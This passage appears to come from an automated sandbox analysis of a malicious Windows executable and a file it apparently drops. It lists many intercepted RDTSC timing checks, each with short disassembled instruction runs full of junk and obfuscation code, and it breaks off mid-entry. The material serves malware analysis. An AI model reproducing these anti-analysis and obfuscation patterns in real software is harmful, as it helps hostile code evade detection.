Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9034C second address: 4B90350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9037D second address: 4B90383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90383 second address: 4B903B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F332h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F528105F337h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B903B3 second address: 4B903DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F528074EBDCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B903DF second address: 4B90420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F528105F336h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F528105F337h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113195D second address: 1131982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F528074EBE6h 0x0000000c jo 00007F528074EBDCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90470 second address: 4B904CF instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushfd 0x00000009 jmp 00007F528105F332h 0x0000000e or cx, F308h 0x00000013 jmp 00007F528105F32Bh 0x00000018 popfd 0x00000019 pop esi 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F528105F331h 0x00000025 xor cx, EE26h 0x0000002a jmp 00007F528105F331h 0x0000002f popfd 0x00000030 mov dx, cx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B904CF second address: 4B90500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov al, B0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F528074EBE7h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov esi, edx 0x0000001a mov di, 7572h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90500 second address: 4B90536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F528105F337h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90561 second address: 4B90567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90634 second address: 4B9069F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F335h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov al, byte ptr [edx] 0x0000000c jmp 00007F528105F32Eh 0x00000011 inc edx 0x00000012 pushad 0x00000013 call 00007F528105F32Eh 0x00000018 pushfd 0x00000019 jmp 00007F528105F332h 0x0000001e adc ecx, 797A8518h 0x00000024 jmp 00007F528105F32Bh 0x00000029 popfd 0x0000002a pop eax 0x0000002b movsx ebx, si 0x0000002e popad 0x0000002f test al, al 0x00000031 pushad 0x00000032 mov al, BCh 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9069F second address: 4B9069F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F528074EBE4h 0x00000008 sbb si, A6A8h 0x0000000d jmp 00007F528074EBDBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 jne 00007F528074EB54h 0x0000001c mov al, byte ptr [edx] 0x0000001e jmp 00007F528074EBDEh 0x00000023 inc edx 0x00000024 pushad 0x00000025 call 00007F528074EBDEh 0x0000002a pushfd 0x0000002b jmp 00007F528074EBE2h 0x00000030 adc ecx, 797A8518h 0x00000036 jmp 00007F528074EBDBh 0x0000003b popfd 0x0000003c pop eax 0x0000003d movsx ebx, si 0x00000040 popad 0x00000041 test al, al 0x00000043 pushad 0x00000044 mov al, BCh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B906D7 second address: 4B906DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B906DB second address: 4B906EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub edx, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B906EA second address: 4B906F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B906F0 second address: 4B90720 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F528074EBE8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90720 second address: 4B9072F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9072F second address: 4B90784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a jmp 00007F528074EBDEh 0x0000000f lea ebx, dword ptr [edi+01h] 0x00000012 pushad 0x00000013 mov ax, 307Dh 0x00000017 mov edi, esi 0x00000019 popad 0x0000001a mov al, byte ptr [edi+01h] 0x0000001d jmp 00007F528074EBE4h 0x00000022 inc edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90784 second address: 4B907A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B907A1 second address: 4B907C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 jmp 00007F528074EBE3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test al, al 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, dx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B907C6 second address: 4B907CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B907CC second address: 4B907D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B907D0 second address: 4B907F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F335h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F52F1DE75BAh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov ax, B2F9h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B907F8 second address: 4B9085D instructions: 0x00000000 rdtsc 0x00000002 call 00007F528074EBE6h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F528074EBDBh 0x00000010 sbb ax, B79Eh 0x00000015 jmp 00007F528074EBE9h 0x0000001a popfd 0x0000001b popad 0x0000001c mov ecx, edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F528074EBE8h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9085D second address: 4B90863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90863 second address: 4B90890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 shr ecx, 02h 0x0000000c jmp 00007F528074EBE0h 0x00000011 rep movsd 0x00000013 rep movsd 0x00000015 rep movsd 0x00000017 rep movsd 0x00000019 rep movsd 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90890 second address: 4B90894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90894 second address: 4B9089A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9089A second address: 4B9089F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9089F second address: 4B90937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F528074EBE9h 0x00000013 xor ecx, 3A9A01F6h 0x00000019 jmp 00007F528074EBE1h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F528074EBE0h 0x00000025 and esi, 366BAB18h 0x0000002b jmp 00007F528074EBDBh 0x00000030 popfd 0x00000031 popad 0x00000032 and ecx, 03h 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F528074EBE4h 0x0000003c sbb ax, 9578h 0x00000041 jmp 00007F528074EBDBh 0x00000046 popfd 0x00000047 mov ebx, esi 0x00000049 popad 0x0000004a rep movsb 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90937 second address: 4B9093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9093B second address: 4B90952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90952 second address: 4B90993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F528105F32Ah 0x00000019 and cl, 00000068h 0x0000001c jmp 00007F528105F32Bh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90993 second address: 4B90A2E instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 mov ebx, 5E3A58D6h 0x0000000d pushfd 0x0000000e jmp 00007F528074EBE7h 0x00000013 jmp 00007F528074EBE3h 0x00000018 popfd 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, ebx 0x0000001d pushad 0x0000001e mov bh, ah 0x00000020 pushfd 0x00000021 jmp 00007F528074EBE1h 0x00000026 sub esi, 09DFCB96h 0x0000002c jmp 00007F528074EBE1h 0x00000031 popfd 0x00000032 popad 0x00000033 mov ecx, dword ptr [ebp-10h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F528074EBE3h 0x0000003f jmp 00007F528074EBE3h 0x00000044 popfd 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90A2E second address: 4B90A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90A33 second address: 4B90A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528074EBE2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90A49 second address: 4B90A87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], ecx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F528105F32Dh 0x00000016 add ecx, 5E135FB6h 0x0000001c jmp 00007F528105F331h 0x00000021 popfd 0x00000022 popad 0x00000023 pop ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90A87 second address: 4B90A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90A9D second address: 4B90AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F528105F331h 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 call 00007F528105F333h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F528105F337h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90AEA second address: 4B90561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007F528074EBDEh 0x0000000f leave 0x00000010 pushad 0x00000011 movzx eax, di 0x00000014 pushad 0x00000015 jmp 00007F528074EBE4h 0x0000001a popad 0x0000001b popad 0x0000001c retn 0008h 0x0000001f cmp dword ptr [ebp-2Ch], 10h 0x00000023 mov eax, dword ptr [ebp-40h] 0x00000026 jnc 00007F528074EBD5h 0x00000028 push eax 0x00000029 lea edx, dword ptr [ebp-00000590h] 0x0000002f push edx 0x00000030 call esi 0x00000032 push 00000008h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90C2C second address: 4B90C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528105F32Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90C3C second address: 4B90C40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90C40 second address: 4B90C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90C4F second address: 4B90C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F528074EBDFh 0x0000000b add cx, AE1Eh 0x00000010 jmp 00007F528074EBE9h 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90C8C second address: 4B90C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90C90 second address: 4B90C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90C94 second address: 4B90C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90C9A second address: 4B90CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F528074EBDDh 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A1C0FF second address: A1C114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528105F331h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A1C114 second address: A1C11A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A2579E second address: A257C7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F528105F338h 0x00000016 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A257C7 second address: A257E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528074EBE9h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A25ABB second address: A25AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29926 second address: A2993D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F528074EBD6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F528074EBE4h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A2993D second address: A29941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29941 second address: A2999E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 movzx edx, dx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F528074EBD8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D3888h] 0x0000002c movsx ecx, ax 0x0000002f call 00007F528074EBD9h 0x00000034 pushad 0x00000035 jmp 00007F528074EBDAh 0x0000003a js 00007F528074EBD8h 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jg 00007F528074EBD6h 0x0000004e rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A2999E second address: A299BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A299BB second address: A299DA instructions: 0x00000000 rdtsc 0x00000002 je 00007F528074EBD8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007F528074EBDBh 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A299DA second address: A29A82 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F528105F326h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jmp 00007F528105F338h 0x00000014 pushad 0x00000015 jo 00007F528105F326h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007F528105F333h 0x00000028 pop eax 0x00000029 xor edi, 04F1F4F2h 0x0000002f push 00000003h 0x00000031 or dword ptr [ebp+122D25EBh], ecx 0x00000037 push 00000000h 0x00000039 jmp 00007F528105F32Dh 0x0000003e push 00000003h 0x00000040 or esi, 02DD58C4h 0x00000046 call 00007F528105F329h 0x0000004b pushad 0x0000004c jmp 00007F528105F32Fh 0x00000051 jg 00007F528105F33Ah 0x00000057 popad 0x00000058 push eax 0x00000059 push edi 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29A82 second address: A29A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29A88 second address: A29AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F528105F337h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29AB2 second address: A29AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29AB7 second address: A29ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528105F330h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29BC4 second address: A29C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F528074EBDFh 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jns 00007F528074EBDCh 0x00000014 mov ecx, dword ptr [ebp+122D3B58h] 0x0000001a push 00000000h 0x0000001c pushad 0x0000001d pushad 0x0000001e push esi 0x0000001f pop ecx 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 mov cl, 81h 0x00000025 popad 0x00000026 call 00007F528074EBD9h 0x0000002b jnl 00007F528074EBE4h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29C06 second address: A29C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F528105F326h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jns 00007F528105F328h 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 je 00007F528105F326h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29C31 second address: A29C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29C36 second address: A29C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29C3C second address: A29C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29C40 second address: A29C44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29C44 second address: A29CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jmp 00007F528074EBDFh 0x00000010 jl 00007F528074EBDCh 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007F528074EBE3h 0x00000020 pop eax 0x00000021 sub dx, B53Dh 0x00000026 push 00000003h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F528074EBD8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 push ecx 0x00000043 jg 00007F528074EBDCh 0x00000049 pop ecx 0x0000004a mov di, 9123h 0x0000004e push 00000000h 0x00000050 jmp 00007F528074EBE6h 0x00000055 push 00000003h 0x00000057 cld 0x00000058 push 97D4042Ah 0x0000005d push eax 0x0000005e push edx 0x0000005f push esi 